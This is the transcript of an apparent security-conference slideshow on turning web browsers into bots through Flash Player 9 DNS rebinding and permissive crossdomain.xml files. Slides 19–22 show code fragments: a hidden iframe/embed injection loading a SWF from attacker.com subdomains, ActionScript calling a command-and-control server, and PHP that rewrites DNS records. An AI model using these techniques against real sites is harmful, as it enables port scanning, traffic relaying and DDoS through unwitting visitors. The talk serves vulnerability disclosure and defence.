Zombilizing The Web Browser Via Flash Player 9

Slideshow Transcript

1. Slide 1: Zombilizing The Web Browers Via Flash Player 9 Thai N. Duong <thaidn AT gmail DOT com> http://vnhacker.blogspot.com
2. Slide 2: Overview Flash Player 9 and its potential weaknesses  Socket class  Breaking the same-origin policy using crossdomain.xml and  DNS Spoofing Exploiting the weaknesses  Introducing FlashBot  Demo  Workarounds 
3. Slide 3: Flash Player 9 Socket class Quote from Flash 9 documentation  “The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”
4. Slide 4: Flash Player 9 Socket class Quote from Flash 9 documentation  “The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.” Let's port nmap to ActionScript!
5. Slide 5: Flash Player 9 Socket class Quote from Flash 9 documentation  “The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.” Let's port nmap to ActionScript! Err wait, how about the same-origin policy?
6. Slide 6: Same-Origin Policy originally released with Netscape Navigator 2.0 and  has been incorporated into every major browser since prevents a document or script loaded from one site of  origin from manipulating properties of or communicating with a document loaded from another site of origin origin = domain name + port + protocol
7. Slide 7: Same-Origin Policy
8. Slide 8: Flash Player 9 Same-Origin Policy
9. Slide 9: Breaking the SOP: crossdomain.xml A SWF file from a.com may read from the server at  b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains). <?xml version=\"1.0\"?> <!DOCTYPE cross-domain-policy SYSTEM \"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd\"> <cross-domain-policy> <allow-access-from domain=”*” to-ports=”*” /> </cross-domain-policy> Yahoo! - http://api.search.yahoo.com/crossdomain.xml YouTube - http://www.youtube.com/crossdomain.xml Amazon.com - http://www.amazon.com/crossdomain.xml
10. Slide 10: DNS Pinning Explained same-origin policy  origin = domain name + port + protocol
11. Slide 11: DNS Pinning Explained same-origin policy  origin = domain name + port + protocol DNS is not static, and host names could potentially  resolve to different addresses over the course of a browsing session. Dynamic DNS anybody? Browsers use DNS pinning to prevent attackers from  manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain
12. Slide 12: DNS Pinning same-origin policy  origin = domain name + port + protocol DNS is not static, and host names could potentially  resolve to different addresses over the course of a browsing session. Browsers use DNS pinning to prevent attackers from  manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain fact: Flash Player does not pin DNS at all.
13. Slide 13: Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.
14. Slide 14: Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. 2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.
15. Slide 15: Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. 2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. 3) Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.
16. Slide 16: Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. 2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. 3) Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located. 4) The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com.
17. Slide 17: Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. 2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. 3) Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located. 4) The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com 5) The SWF file located on www.attacker.com now has full access to www.example.com
18. Slide 18: FlashBot 101 an 130KB SWF file written in ActionScript 3.0 that  works on all web browsers supporting Flash Player 9 once loaded on victim web browsers, FlashBot can  leverage victim computers to execute commands received from a C&C server commands that FlashBot understands:   port scaning socket relaying (i.e., to send shellcode)  launching web DDoS attacks 
19. Slide 19: How FlashBot works FlashBot is secretly inserted into www.example.com via  JavaScript or iframe: function source() { return \"http://\" + Math.random().toString().substr(2) + \".\" + \"attacker.com/flashbot.swf\" ; } document.write('<object width=\"1\" height=\"1\">'); document.write('<embed src=\"' + source() + '\" type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\">'); document.write('</embed></object>');
20. Slide 20: How FlashBot works Victim visits www.example.com to load FlashBot from  http://<random-subdomain>.attacker.com/flashbot.swf ActionScript in FlashBot connects back to the C&C server:  private function getCommand(subdomain:String, domain:String):void { var cnc: String = \"http://cnc\" + \".\" + domain; var connection:NetConnection = new NetConnection(); connection.connect(cnc + \"/flashservices/gateway.php\"); connection.call(\"FlashBot.getCommand\", responder, subdomain, domain); }
21. Slide 21: How FlashBot works C&C server sends to FlashBot a command which is associated  with a target IP address C&C server automatically updates the DNS server (powered  by PowerDNS) to map the subdomain of victim to the target IP address: $query = \"SELECT 1 FROM records WHERE name = '$record_name'\"; $result = mysql_query($query); if ( mysql_num_rows($result) ) { $query = \"UPDATE records SET content='$ip' WHERE name='$record_name'\"; } else { $query = \"INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', '6', NULL, NULL)\"; }
22. Slide 22: How FlashBot works ActionScript in FlashBot waits for the DNS information expires:  timer1 = new Timer( 10 * 1000, 1 ); timer1.addEventListener( TimerEvent.TIMER, exeCommand ); timer1.start(); FlashBot executes the command, and (optionally) sends the  result back to C&C then to start over the whole process.
23. Slide 23: Show Time! - set your DNS server to 221.133.4.24 - start Wireshark to see what you send out!
24. Slide 24: Demo 1: port scanning works on Firefox  scan 127.0.0.1  scan all other hosts in the same subnet with the victim  http://www.example.com/scanport.html
25. Slide 25: Demo 2: socket relaying works on all browsers supporting Flash Player 9  relay socket connection to any IP address in the intranets and  the Internet can be used to send shellcodes, spam mails, launch DDoS  attacks http://www.example.com/relay.html
26. Slide 26: Workarounds disable Flash Player (and all other plugins) in your web  browser. still want to watch youtube.com? use Firefox + NoScript +  FlashBlock restrict browser access to only port 80 and 443 using a  personal firewall
27. Slide 27: Thanks DAB Security Team  VNSecurity Team, esp. rd and aquynh  http://christ1an.blogspot.com  http://www.jumperz.net  theresacow: I own you a hug ;). 
28. Slide 28: Zombilizing The Web Browers Via Flash Player 9 Thank you! Questions/Comments? Thai N. Duong